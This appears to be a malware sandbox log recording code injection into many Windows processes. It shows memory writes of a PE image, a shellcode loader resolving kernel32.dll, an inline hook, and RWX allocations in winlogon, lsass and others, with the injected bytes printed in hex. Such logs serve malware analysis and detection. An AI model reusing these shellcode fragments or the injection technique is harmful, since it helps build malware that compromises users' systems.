1828 C:\WINDOWS\system32\ctfmon.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1828 C:\WINDOWS\system32\ctfmon.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1828 C:\WINDOWS\system32\ctfmon.exe A30000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1828 C:\WINDOWS\system32\ctfmon.exe 7C90CFEE 5 E9 BF 33 12 84 success or wait 1 BAE2A6F
448 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
448 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
448 C:\WINDOWS\system32\svchost.exe A60000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
448 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 15 84 success or wait 1 BAE2A6F
508 C:\Program Files\Java\jre6\bin\jqs.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
508 C:\Program Files\Java\jre6\bin\jqs.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
508 C:\Program Files\Java\jre6\bin\jqs.exe 10A0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
508 C:\Program Files\Java\jre6\bin\jqs.exe 7C90CFEE 5 E9 BF 33 79 84 success or wait 1 BAE2A6F
1988 C:\WINDOWS\system32\alg.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1988 C:\WINDOWS\system32\alg.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1988 C:\WINDOWS\system32\alg.exe 990000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1988 C:\WINDOWS\system32\alg.exe 7C90CFEE 5 E9 BF 33 08 84 success or wait 1 BAE2A6F
236 C:\WINDOWS\system32\wscntfy.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
236 C:\WINDOWS\system32\wscntfy.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
236 C:\WINDOWS\system32\wscntfy.exe AE0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
236 C:\WINDOWS\system32\wscntfy.exe 7C90CFEE 5 E9 BF 33 1D 84 success or wait 1 BAE2A6F
724 C:\WINDOWS\system32\msiexec.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
724 C:\WINDOWS\system32\msiexec.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
724 C:\WINDOWS\system32\msiexec.exe 990000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
724 C:\WINDOWS\system32\msiexec.exe 7C90CFEE 5 E9 BF 33 08 84 success or wait 1 BAE2A6F
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe C00000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90CFEE 5 E9 BF 33 2F 84 success or wait 1 BAE2A6F
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 650000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90CFEE 5 E9 BF 33 D4 83 success or wait 1 BAE2A6F
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 8F0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
2224 C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE 7C90CFEE 5 E9 BF 33 FE 83 success or wait 1 BAE2A6F
2264 C:\WINDOWS\system32\svchost.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 BAD764B
2264 C:\WINDOWS\system32\svchost.exe BADAFFC 13 B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 1 BAF1733
2264 C:\WINDOWS\system32\svchost.exe 9A0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 BAE7FF4
2264 C:\WINDOWS\system32\svchost.exe 7C90CFEE 5 E9 BF 33 09 84 success or wait 1 BAE2A6F
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
636 C:\WINDOWS\system32\winlogon.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
636 C:\WINDOWS\system32\winlogon.exe A30000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
692 C:\WINDOWS\system32\lsass.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
692 C:\WINDOWS\system32\lsass.exe 9B0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
892 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
892 C:\WINDOWS\system32\svchost.exe EB0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
968 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
968 C:\WINDOWS\system32\svchost.exe AF0000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1052 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1052 C:\WINDOWS\system32\svchost.exe 1A80000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1100 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1100 C:\WINDOWS\system32\svchost.exe 890000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1144 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1144 C:\WINDOWS\system32\svchost.exe 990000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1496 C:\WINDOWS\system32\spoolsv.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1496 C:\WINDOWS\system32\spoolsv.exe A40000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
1636 C:\WINDOWS\explorer.exe BAD0000 216FBA8 page execute and read and write conflicting addresses 1 BAE5848
1636 C:\WINDOWS\explorer.exe BB16000 216FBA8 page execute and read and write conflicting addresses 1 BAE5848
1636 C:\WINDOWS\explorer.exe BB50000 216FBA8 page execute and read and write success or wait 1 BAE5848
1828 C:\WINDOWS\system32\ctfmon.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
1828 C:\WINDOWS\system32\ctfmon.exe A30000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
448 C:\WINDOWS\system32\svchost.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
448 C:\WINDOWS\system32\svchost.exe A60000 216FBD8 page execute and read and write success or wait 1 BAE7FF4
508 C:\Program Files\Java\jre6\bin\jqs.exe BAD0000 216FBA8 page execute and read and write success or wait 1 BAE5800
